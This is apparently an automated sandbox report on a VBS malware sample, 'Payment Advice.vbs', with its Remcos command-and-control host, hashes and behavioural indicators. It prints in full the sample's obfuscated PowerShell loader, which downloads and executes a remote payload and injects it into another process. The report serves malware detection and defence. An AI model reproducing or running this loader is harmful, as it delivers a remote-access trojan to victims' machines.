Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
21-01-2021 06:21
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice.vbs
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Payment Advice.vbs
Resource
win10v20201028
General
-
Target
Payment Advice.vbs
-
Size
4KB
-
MD5
afccc71a981fa3ea99bf0af6cbbfac4d
-
SHA1
125e81caad716d88d4be375c125156a673d1ecb0
-
SHA256
6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6
-
SHA512
0ea2d841cb7f3a55a6304b1784adecc7e87aa43676583c67084dafe2d702267165873031ac3fd2f5e7aced18aba36a6a5283b03eca2cb754a75fb0ce65955fdd
Malware Config
Extracted
remcos
creditdept01.myq-see.com:6800
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 316 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 316 set thread context of 1576 316 powershell.exe powershell_ise.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 316 powershell.exe 316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 316 powershell.exe Token: SeIncreaseQuotaPrivilege 316 powershell.exe Token: SeSecurityPrivilege 316 powershell.exe Token: SeTakeOwnershipPrivilege 316 powershell.exe Token: SeLoadDriverPrivilege 316 powershell.exe Token: SeSystemProfilePrivilege 316 powershell.exe Token: SeSystemtimePrivilege 316 powershell.exe Token: SeProfSingleProcessPrivilege 316 powershell.exe Token: SeIncBasePriorityPrivilege 316 powershell.exe Token: SeCreatePagefilePrivilege 316 powershell.exe Token: SeBackupPrivilege 316 powershell.exe Token: SeRestorePrivilege 316 powershell.exe Token: SeShutdownPrivilege 316 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeSystemEnvironmentPrivilege 316 powershell.exe Token: SeRemoteShutdownPrivilege 316 powershell.exe Token: SeUndockPrivilege 316 powershell.exe Token: SeManageVolumePrivilege 316 powershell.exe Token: 33 316 powershell.exe Token: 34 316 powershell.exe Token: 35 316 powershell.exe Token: SeIncreaseQuotaPrivilege 316 powershell.exe Token: SeSecurityPrivilege 316 powershell.exe Token: SeTakeOwnershipPrivilege 316 powershell.exe Token: SeLoadDriverPrivilege 316 powershell.exe Token: SeSystemProfilePrivilege 316 powershell.exe Token: SeSystemtimePrivilege 316 powershell.exe Token: SeProfSingleProcessPrivilege 316 powershell.exe Token: SeIncBasePriorityPrivilege 316 powershell.exe Token: SeCreatePagefilePrivilege 316 powershell.exe Token: SeBackupPrivilege 316 powershell.exe Token: SeRestorePrivilege 316 powershell.exe Token: SeShutdownPrivilege 316 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeSystemEnvironmentPrivilege 316 powershell.exe Token: SeRemoteShutdownPrivilege 316 powershell.exe Token: SeUndockPrivilege 316 powershell.exe Token: SeManageVolumePrivilege 316 powershell.exe Token: 33 316 powershell.exe Token: 34 316 powershell.exe Token: 35 316 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell_ise.exepid process 1576 powershell_ise.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1652 wrote to memory of 316 1652 WScript.exe powershell.exe PID 1652 wrote to memory of 316 1652 WScript.exe powershell.exe PID 1652 wrote to memory of 316 1652 WScript.exe powershell.exe PID 1652 wrote to memory of 1676 1652 WScript.exe cmd.exe PID 1652 wrote to memory of 1676 1652 WScript.exe cmd.exe PID 1652 wrote to memory of 1676 1652 WScript.exe cmd.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe PID 316 wrote to memory of 1576 316 powershell.exe powershell_ise.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$RtTaPrCxkdwhsjhbPUin='Q4)QF)20)7B)24)70)Q9)QE)Q7)20)3D)20)74)QO)73)74)2D)Q3)QF)QE)QE)QO)Q3)74)Q9)QF)QE)20)2D)Q3)QF)QD)70)20)Q7)QF)QF)Q7)QC)QO)2E)Q3)QF)QD)20)2D)Q3)QF)7O)QE)74)20)31)20)2D)O1)7O)Q9)QO)74)7D)20)7O)QE)74)Q9)QC)20)28)24)70)Q9)QE)Q7)29)3B)24)74)3O)3Q)QQ)Q7)20)3D)20)OB)4O)QE)7O)QD)OD)3A)3A)O4)QF)4F)Q2)QA)QO)Q3)74)28)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)O4)79)70)QO)OD)2C)20)33)30)37)32)29)3B)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)72)7Q)Q9)Q3)QO)O0)QF)Q9)QE)74)4D)Q1)QE)Q1)Q7)QO)72)OD)3A)3A)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)20)3D)20)24)74)3O)3Q)QQ)Q7)3B)OB)O2)QO)QQ)OD)2E)41)73)73)QO)QD)Q2)QC)79)2E)47)QO)74)O4)79)70)QO)28)27)O3)79)27)2B)27)73)74)QO)QD)2E)27)2B)27)4D)Q1)QE)Q1)27)2B)27)Q7)QO)QD)27)2B)27)QO)QE)74)27)2B)27)2E)41)7O)74)QF)QD)27)2B)27)Q1)74)Q9)QF)27)2B)27)QE)2E)41)27)2B)27)QD)27)2B)27)73)Q9)27)2B)27)OO)74)Q9)QC)73)27)29)2E)47)QO)74)4Q)Q9)QO)QC)Q4)28)27)Q1)27)2B)27)QD)73)27)2B)27)Q9)49)27)2B)27)QE)Q9)74)4Q)Q1)27)2B)27)Q9)QC)QO)Q4)27)2C)27)4E)QF)QE)40)40)40)27)2E)72)QO)70)QC)Q1)Q3)QO)28)27)40)40)40)27)2C)27)O0)7O)Q2)27)29)2B)27)QC)Q9)Q3)2C)O3)27)2B)27)74)Q1)74)Q9)Q3)27)29)2E)O3)QO)74)OQ)Q1)QC)7O)QO)28)24)QE)7O)QC)QC)2C)24)74)72)7O)QO)29)3B)24)74)74)79)3D)27)28)4E)QO)77)2D)27)2B)27)4F)Q2)QA)QO)27)2B)27)Q3)74)20)4E)QO)27)2B)27)74)2E)O7)QO)27)2B)27)Q2)43)QC)Q9)27)2B)27)QO)QE)74)29)27)7C)49)Q0)4O)Q0)O8)3B)OB)7Q)QF)Q9)Q4)OD)20)OB)O3)79)73)74)QO)QD)2E)O2)QO)QQ)QC)QO)Q3)74)Q9)QF)QE)2E)41)73)73)QO)QD)Q2)QC)79)OD)3A)3A)4C)QF)Q1)Q4)O7)Q9)74)Q8)O0)Q1)72)74)Q9)Q1)QC)4E)Q1)QD)QO)28)27)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)27)29)3B)24)QD)7Q)3D)20)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)49)QE)74)QO)72)Q1)Q3)74)Q9)QF)QE)OD)3A)3A)43)Q1)QC)QC)42)79)QE)Q1)QD)QO)28)24)74)74)79)2C)27)44)QF)77)QE)QC)QF)Q1)Q4)O3)74)72)Q9)QE)Q7)27)2C)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)43)Q1)QC)QC)O4)79)70)QO)OD)3A)3A)4D)QO)74)Q8)QF)Q4)2C)27)Q8)74)74)70)3A)2F)2F)Q1)Q3)Q8)2D)QO)Q4)Q9)2E)78)79)7A)2F)4D)QF)QE)74)Q8)QC)79)O0)Q1)79)72)QF)QC)QC)2F)4A)Q1)QE)7O)Q1)72)79)2E)QA)70)Q7)27)29)3B)24)72)37)38)QQ)Q4)30)30)30)73)Q4)3D)20)24)QD)7Q)20)2D)73)70)QC)Q9)74)20)27)2O)27)20)7C)4Q)QF)72)4O)Q1)Q3)Q8)2D)4F)Q2)QA)QO)Q3)74)20)7B)OB)Q3)Q8)Q1)72)OD)OB)Q2)79)74)QO)OD)22)30)78)24)OF)22)7D)3B)24)79)3O)QA)Q8)3Q)32)Q4)QQ)30)3D)20)24)72)37)38)QQ)Q4)30)30)30)73)Q4)20)2D)QA)QF)Q9)QE)20)27)27)7C)49)Q0)4O)Q0)O8'.replace('O','5').replace('Q','6');$DFG45DFG0=$RtTaPrCxkdwhsjhbPUin.Split(')') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell_ise.exe"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell_ise.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs" "C:\Users\Admin\AppData\Local" /Y2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/316-16-0x0000000002650000-0x0000000002651000-memory.dmpFilesize
4KB
-
memory/316-6-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmpFilesize
9.9MB
-
memory/316-2-0x0000000000000000-mapping.dmp
-
memory/316-35-0x00000000026A0000-0x00000000026A6000-memory.dmpFilesize
24KB
-
memory/316-28-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/316-7-0x0000000002090000-0x0000000002091000-memory.dmpFilesize
4KB
-
memory/316-8-0x000000001ACF0000-0x000000001ACF2000-memory.dmpFilesize
8KB
-
memory/316-29-0x0000000002750000-0x0000000002751000-memory.dmpFilesize
4KB
-
memory/316-10-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/316-11-0x000000001ACF4000-0x000000001ACF6000-memory.dmpFilesize
8KB
-
memory/316-12-0x00000000020D0000-0x00000000020D1000-memory.dmpFilesize
4KB
-
memory/316-13-0x0000000002610000-0x0000000002611000-memory.dmpFilesize
4KB
-
memory/316-4-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmpFilesize
8KB
-
memory/316-34-0x0000000002690000-0x0000000002694000-memory.dmpFilesize
16KB
-
memory/316-9-0x000000001AD70000-0x000000001AD71000-memory.dmpFilesize
4KB
-
memory/316-30-0x000000001C680000-0x000000001C681000-memory.dmpFilesize
4KB
-
memory/316-31-0x000000001C360000-0x000000001C361000-memory.dmpFilesize
4KB
-
memory/316-32-0x000000001ACFA000-0x000000001AD19000-memory.dmpFilesize
124KB
-
memory/316-33-0x000000001B7A0000-0x000000001B7C1000-memory.dmpFilesize
132KB
-
memory/1576-37-0x0000000000413FA4-mapping.dmp
-
memory/1576-38-0x0000000075571000-0x0000000075573000-memory.dmpFilesize
8KB
-
memory/1576-36-0x0000000000400000-0x0000000000421000-memory.dmpFilesize
132KB
-
memory/1576-39-0x0000000000400000-0x0000000000421000-memory.dmpFilesize
132KB
-
memory/1652-5-0x00000000026F0000-0x00000000026F4000-memory.dmpFilesize
16KB
-
memory/1676-3-0x0000000000000000-mapping.dmp